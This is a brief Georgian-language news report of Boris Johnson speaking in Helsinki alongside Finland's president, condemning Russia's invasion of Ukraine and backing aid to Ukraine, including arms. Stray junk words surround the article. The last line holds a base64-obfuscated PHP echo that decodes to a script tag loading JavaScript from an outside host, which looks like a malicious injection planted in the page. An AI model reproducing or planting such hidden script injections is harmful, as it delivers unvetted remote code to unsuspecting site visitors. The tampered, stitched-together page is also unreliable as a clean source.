tube
ავერსი jaluzi
თუ პუტინს წინააღმდეგობა არ გავუწიეთ, უკრაინაში შეჭრა არ იქნება მისი ნეოიმპერიალისტური, რევანშისტული ამბიციების დასასრული, – ეს განცხადება დიდი ბრიტანეთის პრემიერ-მინისტრმა ბორის ჯონსონმა ჰელსინკში, ფინეთის პრეზიდენტთან ერთობლივ ბრიფინგზე გააკეთა.
 
ჯონსონმა რუსეთის მიერ უკრაინაში შეჭრა კიდევ ერთხელ დაგმო და გაამახვილა ყურადრება უკრაინის აუცილებელ მხარდაჭერაზე და დახმარებაზე, მათ შორის იარაღით. 
 
"ჩემი მიზანია შევაჩერო შემდგომი კატასტროფა, მათ შორის ეკონომიკური შედეგები. თუ რუსეთის პრეზიდენტ ვლადიმერ პუტინს წინააღმდეგობა არ გავუწიეთ, უკრაინაში შეჭრა არ იქნება მისი ნეოიმპერიალისტური, რევანშისტული ამბიციების დასასრული. კატასტროფის ან რომელიმე ჩვენგანზე თავდასხმის შემთხვევაში, დიახ, ჩვენ დავეხმარებით ერთმანეთს, მათ შორის სამხედრო კუთხით, მაგრამ ამ დახმარების ბუნება დამოკიდებული იქნება მეორე მხარის მოთხოვნაზე," - განაცხადა ბორის ჯონსონი.
796
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");